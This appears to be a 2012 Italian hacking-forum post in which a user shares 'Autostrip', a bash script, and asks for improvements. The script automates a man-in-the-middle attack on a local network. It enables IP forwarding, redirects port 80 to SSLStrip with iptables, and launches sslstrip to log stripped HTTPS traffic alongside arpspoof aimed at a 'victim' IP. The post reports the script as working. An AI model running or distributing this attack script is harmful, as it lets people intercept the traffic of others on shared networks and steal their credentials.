a) Non so se sia la sezione giusta, ma sembrava quella più adatta, nel caso spostate
b) Mi vergogno non poco per quello che sto per proporvi, ma 2 bicchieri di vino mi hanno reso immune all'ansia da prestazione
c) Abbiate pazienza, non sono un programmatore ma l'unica cosa per colmare le lacune è chiedere a voi di correggermi e suggerirmi....
dunque, partendo dal post del buon
http://www.clshack.com/sslstrip-ettercap-attack-ssl-and-sniff-secure-connetions.htmlho deciso di fare uno script per gestire le operazioni in automatico, e questo è il risultato:
#!/bin/bash
#Autostrip
#Automazione SslStrip+arpspoof
#
DPORT="80" ; #Porta che voglio reindirizzare verso la TPORT
TPORT="1000" ; #Porta usata da SSLStrip, cambiala se vuoi o se occupata da altro!
IPF=/proc/sys/net/ipv4/ip_forward ;
# FUNZIONE DI AIUTO
fun_help () {
echo
echo
echo "[-]Autostrip automatizza le operazioni comuni per lo sniffing"
echo "[-]Reindirizza la porta 80 sulla porta 1000 di SSLStrip"
echo "[-]Puoi modificare la \"to-port\" 1000, cambiando il valore di \"\$TPORT\""
echo "[-]Devi avere installato sslstrip e arpspoof,"
echo "[-]Esegui\"apt-get install sslstrip arpspoof\" in caso contrario"
echo "[-]Utilizzo: ./autostrip.sh ip_gateway ip_vittima interfaccia"
echo "[-]Inserisci i parametri nell'ordine esatto indicato."
echo "[*]Esempio: ./autostrip.sh 192.168.0.1 192.168.0.100 wlan0"
echo "[***]Usa la testa e Good Hack!"
exit
}
# FINE HELP
# CONTROLLO: UID, PARAMETRI, PROG. NECESSARI, IP_FORWARD
if [ $UID != "0" ]
then
echo "Non hai i permessi necessari per eseguire lo script! need to be root!" && fun_help
fi
which sslstrip || echo "sslstrip non è presente" exit ;
which arpspoof || echo "arpspoof non è presente" exit ;
if [ `cat $IPF` = "0" ]
then
echo "attivo ip_forward che non lo era" && echo 1 > $IPF ;
else
echo "ip_forward già attivo"
fi
if [ $# != "3" ] #non controllo che gli indirizzi siano giusti, che si fotta!
then
echo "hai inserito $# parametri, devi inserirne 3" && fun_help
else
echo "Tutti i controlli superati con successo!!"
fi
# FINE DEI CONTROLLI
echo
# PREPARO IPTABLES
iptables -t nat -A PREROUTING -p tcp --destination-port $DPORT -j REDIRECT --to-port $TPORT
if [ $? != 0 ]
then
echo "impossibile scrivere le iptables" && fun_help
else
echo "iptables scritte con successo!"
fi
# FINE IPTABLES
echo
# RIEPILOGO
echo "[*]IP Gateway:$1"
echo "[*]IP Vittima:$2"
echo "[*]Interfaccia:$3"
echo -n "Premi si per continuare, n per abortire:[si] "
read TASTO
case $TASTO in
n)echo "esco!" && exit ;;
s)echo ;;
*)echo ;;
esac
echo "bella pe tte!"
# FINE RIEPILOGO
echo
# AVVIO SSLStrip
( xfce4-terminal -e "sslstrip -l $TPORT -w log_ssl -p -a" ) &
if [ $? != 0 ]
then
echo "sslstrip ha fallito" && fun_help
else
echo "sslstrip avviato con successo!"
fi
##
echo
#AVVIO ARPSPOOF
( xfce4-terminal -e "arpspoof -i $3 -t $2 $1" ) &
if [ $? != 0 ]
then
echo "arpspoof ha fallito" && fun_help
else
echo "arpspoof avviato con successo!"
fi
##
echo
Funziona? ni! Nel senso non ci sono più errori ma è evidente che vada migliorato e poi, la cosa che mi preme di più è avviare arpspoof e sslstrip con processi separati ma purtroppo non riesco a trovare più vecchie dispense che mi mostravano come fare (son sicuro di aver letto qualcosa a proposito), ho provato anche con xterm -e ma non funfa.... tra l'altro in questo modo girano in bg, forse sarebbe meglio in fg??? se qualche anima pia ha voglia di darmi qualche dritta, io son qui!
Grazie e scusate il disturbo!!!
edit:script aggiornato e funzionante... ora arpspoof e sslstrip si aprono in terminali separati e indipendenti!
« Last Edit: February 03, 2012, 07:55:07 PM by raffaele »
una voce libera è sempre liberatrice
under_r00t